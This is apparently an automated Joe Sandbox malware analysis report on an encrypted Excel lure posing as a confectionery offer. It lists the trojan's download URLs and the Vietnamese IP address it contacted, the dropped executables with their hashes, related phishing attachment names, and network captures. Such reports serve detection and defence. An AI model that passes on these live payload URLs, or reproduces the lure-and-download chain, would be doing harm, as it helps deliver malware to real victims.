    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection12 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information11 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol121 | SIM Card Swap | | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery313 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

    Behavior Graph

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe | 43% | ReversingLabs | Win32.Trojan.Vebzenpak
    C:\Users\Public\vbc.exe | 43% | ReversingLabs | Win32.Trojan.Vebzenpak

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin | 0% | Avira URL Cloud | safe
    http://180.214.239.39/process/.svchost.exe | 100% | Avira URL Cloud | malware

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin | true | Avira URL Cloud: safe | unknown
    http://180.214.239.39/process/.svchost.exe | true | Avira URL Cloud: malware | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://www.day.com/dam/1.0 | F70A7842.emf.0.dr | false | | high

      Contacted IPs

      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      180.214.239.39 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:452495
      Start date:22.07.2021
      Start time:14:01:33
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 7m 26s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:2
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/13@0/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 53%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
      • TCP Packets have been reduced to 100
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/452495/sample/MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

      Simulations

      Behavior and APIs

      Time | Type | Description
      14:03:18 | API Interceptor | 69x Sleep call for process: EQNEDT32.EXE modified

      Joe Sandbox View / Context

      IPs

      Match: 180.214.239.39
      Associated Sample Name / URL | Detection | Context
      new order requirment-21 July.xlsx | malicious
      • 180.214.239.39/service/.svchost.exe
      Booking Confirmation.xlsx | malicious
      • 180.214.239.39/network/.svchost.exe
      CMA-CGM BOOKING CONFIRMATION.xlsx | malicious
      • 180.214.239.39/disk/.svchost.exe
      MTIR21487610_0062180102_20210714081247.PDF.xlsx | malicious
      • 180.214.239.39/user/.svchost.exe
      MTIR21487610_0062180102_20210714081247.PDF.xlsx | malicious
      • 180.214.239.39/cpu/.svchost.exe
      Booking Confirmation.xlsx | malicious
      • 180.214.239.39/port/.svchost.exe
      6306093940.xlsx | malicious
      • 180.214.239.39/ssh/.svchost.exe
      6306093940.xlsx | malicious
      • 180.214.239.39/mssn/.svchost.exe

      Domains

      No context

      ASN

      Match: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
      Associated Sample Name / URL | Detection | Context
      DHL 07988 AWB 202107988.xlsx | malicious
      • 180.214.236.151
      new order requirment-21 July.xlsx | malicious
      • 180.214.239.39
      SKM_C258201001130020005057R1RE.jar | malicious
      • 103.133.104.124
      Booking Confirmation.xlsx | malicious
      • 180.214.239.39
      RFQ- 7075-T6 ( PLASTIC MOULD POLY INDUSTRIES 02993 INQUIRE).xlsx | malicious
      • 180.214.236.151
      shipping document.xlsx | malicious
      • 103.140.250.43
      DHL 07988 AWB 202107988.xlsx | malicious
      • 180.214.236.151
      CMA-CGM BOOKING CONFIRMATION.xlsx | malicious
      • 180.214.239.39
      SO-19844 EIDCO.ppam | malicious
      • 103.141.137.204
      qHuGyYm6MV.exe | malicious
      • 103.133.104.146
      INV 2429.xlsx | malicious
      • 180.214.236.151
      PROFORMA_INVOICE.xlsx | malicious
      • 103.140.250.43
      MTIR21487610_0062180102_20210714081247.PDF.xlsx | malicious
      • 180.214.239.39
      kung.xlsx | malicious
      • 103.140.250.43
      kung.xlsx | malicious
      • 103.140.250.43
      SYHPpy5x6D.exe | malicious
      • 103.133.104.146
      Swift.xlsx | malicious
      • 103.133.104.146
      S&P-RFQ #2004668.xlsx | malicious
      • 180.214.236.151
      NEW ORDER.xlsx | malicious
      • 103.140.250.43
      MTIR21487610_0062180102_20210714081247.PDF.xlsx | malicious
      • 180.214.239.39

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:downloaded
      Size (bytes):246888
      Entropy (8bit):4.648392883751036
      Encrypted:false
      SSDEEP:1536:HrnnnnnnnnnnnnnnnrKDnnnnnnnnnnnnnnnCnnnnnnnnnnnnnnXnnnnnnnnnnnnE:H6LVbA8nT1vnv9dnj6czcW
      MD5:C937FC9ED4325E6AB24D49A3175F3A5C
      SHA1:00439295920E78ECAC31D1DBF7EB67118D76299A
      SHA-256:D54CAFC1CA36D0DDD134F53D033EBBAAA490721D62D4168106A9B6C7CFA200BA
      SHA-512:FF13A5D3BFD503E0F11C9D974A4AC88F965EEC14CBF07723AC9ED425222AAA7C5871A6438CD7491FBD694424EBE4C8675DC076E81564204583336A2940E9A9D0
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 43%
      Reputation:low
      IE Cache URL:http://180.214.239.39/process/.svchost.exe
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15AA81A0.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Reputation:moderate, very likely benign file
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\302029DA.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Reputation:moderate, very likely benign file
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\302CBFD.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
      Category:dropped
      Size (bytes):62140
      Entropy (8bit):7.529847875703774
      Encrypted:false
      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
      MD5:722C1BE1697CFCEAE7BDEFB463265578
      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
      Malicious:false
      Reputation:moderate, very likely benign file
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F3E78AE.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5898FC13.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):94963
      Entropy (8bit):7.9700481154985985
      Encrypted:false
      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
      MD5:17EC925977BED2836071429D7B476809
      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
      Malicious:false
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75E4675B.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):7608
      Entropy (8bit):5.077529457823583
      Encrypted:false
      SSDEEP:96:+Si3EL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:50UjU+H3tWa6WdTfOYLpR8d
      MD5:877A9BFE4326CA64857F36D83F6A133A
      SHA1:840AE4701E7688FBA69DD6EF00D1BA411EFD4279
      SHA-256:C3F4CE75A96355CAFA0CED3BFD3281F5B209B1C66F66927DB647364F62BB2F59
      SHA-512:6A02EB2BA6CC3972FF7A482D4E0EC88C0DA36BA7899AFD0BBDDFA089CC23E6AA0ED5B0304A52B674A93E3A3EFC09C3AEBCCED8506AE3D88EDC7E1E968B0DFA8F
      Malicious:false
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1EE5521.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
      Category:dropped
      Size (bytes):62140
      Entropy (8bit):7.529847875703774
      Encrypted:false
      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
      MD5:722C1BE1697CFCEAE7BDEFB463265578
      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
      Malicious:false
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B33F74D7.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):94963
      Entropy (8bit):7.9700481154985985
      Encrypted:false
      SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
      MD5:17EC925977BED2836071429D7B476809
      SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
      SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
      SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
      Malicious:false
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBC598EC.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F70A7842.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):648132
      Entropy (8bit):2.8123900257305956
      Encrypted:false
      SSDEEP:3072:g34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:a4UcLe0JOcXuunhqcS
      MD5:4CF29B659FB8B82E00439C894D65A51A
      SHA1:D6EA4F336DB59C905741EF8AF9833B2C95C3E5FE
      SHA-256:AF4CD42DCF26F7A86A38E8D8C94D2AD208BBF3E76F7442A9A249D386ED92C8D9
      SHA-512:0F694B1B50606ED190CBC6B240151AA14ED718AF469810732C26CC26E2E4F2EE410F72352B03D9A6364F719E8ACC0BF8A953A1FB580709CA726152ABD316F037
      Malicious:false
      C:\Users\user\Desktop\~$MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):330
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
      MD5:96114D75E30EBD26B572C1FC83D1D02E
      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
      Malicious:false
      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      C:\Users\Public\vbc.exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):246888
      Entropy (8bit):4.648392883751036
      Encrypted:false
      SSDEEP:1536:HrnnnnnnnnnnnnnnnrKDnnnnnnnnnnnnnnnCnnnnnnnnnnnnnnXnnnnnnnnnnnnE:H6LVbA8nT1vnv9dnj6czcW
      MD5:C937FC9ED4325E6AB24D49A3175F3A5C
      SHA1:00439295920E78ECAC31D1DBF7EB67118D76299A
      SHA-256:D54CAFC1CA36D0DDD134F53D033EBBAAA490721D62D4168106A9B6C7CFA200BA
      SHA-512:FF13A5D3BFD503E0F11C9D974A4AC88F965EEC14CBF07723AC9ED425222AAA7C5871A6438CD7491FBD694424EBE4C8675DC076E81564204583336A2940E9A9D0
      Malicious:true
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 43%
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....\S.................0...p......0........@....@.........................................................................t0..(....P...T..........X.......................................................(... ....................................text....$.......0.................. ..`.data........@.......@..............@....rsrc....T...P...`...P..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:CDFV2 Encrypted
      Entropy (8bit):7.994472821880961
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
      File size:1267200
      MD5:b7cdda847140697b7bb7866b06d2a225
      SHA1:874d1157c6e65813383c6b4bffd4d48948993c88
      SHA256:1e7447cb7adb3336fcf6d2837781a2ab0d9f9fd3060cde3a47293bd34a883cdb
      SHA512:8f4b6dd946571e501968cd8317012923d0ca879e3b8bd6cac782a5498887dbb15ca8ce2132a67d5e85a9d05fd700206892ea2789ba805af7be795a3aa005485c
      SSDEEP:24576:nPaV0dsm4NwrrC+F5BNEggUPmQIE9Nc3HCcbRPJHVYgt0W/uMCrYjxaY5SAF:Pw0Jl3OUbIEsXdbRxbh/aBYh
      File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

      File Icon

      Icon Hash:e4e2aa8aa4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx"

      Indicators

      Has Summary Info:False
      Application Name:unknown
      Encrypted Document:True
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:False
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:False

      Streams

      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
      General
      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
      File Type:data
      Stream Size:64
      Entropy:2.73637206947
      Base64 Encoded:False
      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
      General
      Stream Path:\x6DataSpaces/DataSpaceMap
      File Type:data
      Stream Size:112
      Entropy:2.7597816111
      Base64 Encoded:False
      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
      General
      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
      File Type:data
      Stream Size:200
      Entropy:3.13335930328
      Base64 Encoded:False
      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
      General
      Stream Path:\x6DataSpaces/Version
      File Type:data
      Stream Size:76
      Entropy:2.79079600998
      Base64 Encoded:False
      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
      Stream Path: EncryptedPackage, File Type: data, Stream Size: 1253128
      General
      Stream Path:EncryptedPackage
      File Type:data
      Stream Size:1253128
      Entropy:7.99876914636
      Base64 Encoded:True
      Data ASCII:. . . . . . . . . R . v . . . s x . . . . O . . . . . . . . F . . . > . . . . Z I s . z . . . . . . . Y . ( P . V * . . . . . B . T . 6 . k . ) . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P . P . . . ( H H R . . \\ ) 6 . P .
      Data Raw:f8 1e 13 00 00 00 00 00 88 52 18 76 d2 ca a0 73 78 bd a8 80 1c 4f c6 86 b6 da e5 18 a1 ac 46 0a fd ec 3e c9 c5 9e b4 5a 49 73 ae 7a bd 11 aa c2 de 9b d7 59 c9 28 50 15 56 2a 14 da dd 1a a5 42 a0 54 0c 36 d6 6b d7 29 a9 d8 5c 29 36 ca 50 f6 50 c9 fa 14 28 48 48 52 a9 d8 5c 29 36 ca 50 f6 50 c9 fa 14 28 48 48 52 a9 d8 5c 29 36 ca 50 f6 50 c9 fa 14 28 48 48 52 a9 d8 5c 29 36 ca 50 f6
      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
      General
      Stream Path:EncryptionInfo
      File Type:data
      Stream Size:224
      Entropy:4.60634954238
      Base64 Encoded:False
      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . 1 . . . % . . 3 . . i . . 0 . * 2 . P . . ` h 9 . . u . z . . . . . . . . ; . ' | . . . ] ; . . . . . . . . . . ! . . . ( . . . . .
      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

      Network Behavior

      Network Port Distribution

      TCP Packets

      Timestamp                             Source Port  Dest Port  Source IP        Dest IP
      Jul 22, 2021 14:03:05.376049995 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:05.622277021 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:05.622356892 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:05.622628927 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:05.870244980 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:05.870277882 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:05.870312929 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:05.870343924 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:05.870420933 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:05.870445013 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.118174076 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.118226051 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.118263960 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.118300915 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.118336916 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.118356943 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.118376017 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.118396997 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.118398905 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.118415117 CEST  80           49167      180.214.239.39   192.168.2.22
